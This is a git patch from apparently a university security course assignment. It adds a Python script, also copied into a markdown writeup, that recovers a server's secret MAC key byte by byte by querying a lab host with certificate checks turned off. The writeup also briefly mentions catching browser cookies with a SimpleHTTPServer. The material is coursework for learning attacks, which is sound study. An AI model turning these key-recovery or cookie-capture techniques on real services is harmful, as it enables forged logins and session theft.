From 42065d116ddfb196edfde4c9d90fae72ea36bf19 Mon Sep 17 00:00:00 2001 From: Matt Strapp Date: Mon, 13 Dec 2021 21:54:54 -0600 Subject: finish ho2 --- csci5271/ho2/crack6.py | 24 ++++++++++++++++++++---- csci5271/ho2/writeup.md | 28 ++++++++++++++++++++++++++++ 2 files changed, 48 insertions(+), 4 deletions(-) diff --git a/csci5271/ho2/crack6.py b/csci5271/ho2/crack6.py index 60b5a3b..55a9263 100644 --- a/csci5271/ho2/crack6.py +++ b/csci5271/ho2/crack6.py @@ -1,6 +1,22 @@ -# SHA! Key guesser -import hashlib +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +import string -name = "admin" -response = "a1a9f3ebd29ff76d45a609d98e0ec31e83dfbd4d" +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) +actual = "" +key = "Z"*19 +for n in range(19, -1, -1): + res2 = requests.get("https://192.168.14.1/mac-cookie?username="+key, + verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0] + for c in string.printable: + test = key[:n] + c + res1 = requests.get("https://192.168.14.1/mac-cookie?username="+test, + verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0] + print(test, res1, res2) + if res1 == res2: + actual = c + actual + break + key = key[:-1] + +print("Key is", actual) diff --git a/csci5271/ho2/writeup.md b/csci5271/ho2/writeup.md index e752fcb..56d617d 100644 --- a/csci5271/ho2/writeup.md +++ b/csci5271/ho2/writeup.md @@ -95,3 +95,31 @@ The secret to figuring out the SQL injection was ~~trying everything~~ tuning th The main additional thing I did was start up a `SimpleHTTPServer` on port 8080 of the server I have SSH access to. The attack works because the server is making an HTTP request to that port with the cookie being that of the browser. # 6 +## Code +```python +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +import string + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +actual = "" +key = "Z"*19 +for n in range(19, -1, -1): + res2 = requests.get("https://192.168.14.1/mac-cookie?username="+key, + verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0] + for c in string.printable: + test = key[:n] + c + res1 = requests.get("https://192.168.14.1/mac-cookie?username="+test, + verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0] + print(test, res1, res2) + if res1 == res2: + actual = c + actual + break + key = key[:-1] + +print("Key is", actual) +``` + +## Key +`###################k` -- cgit v1.2.3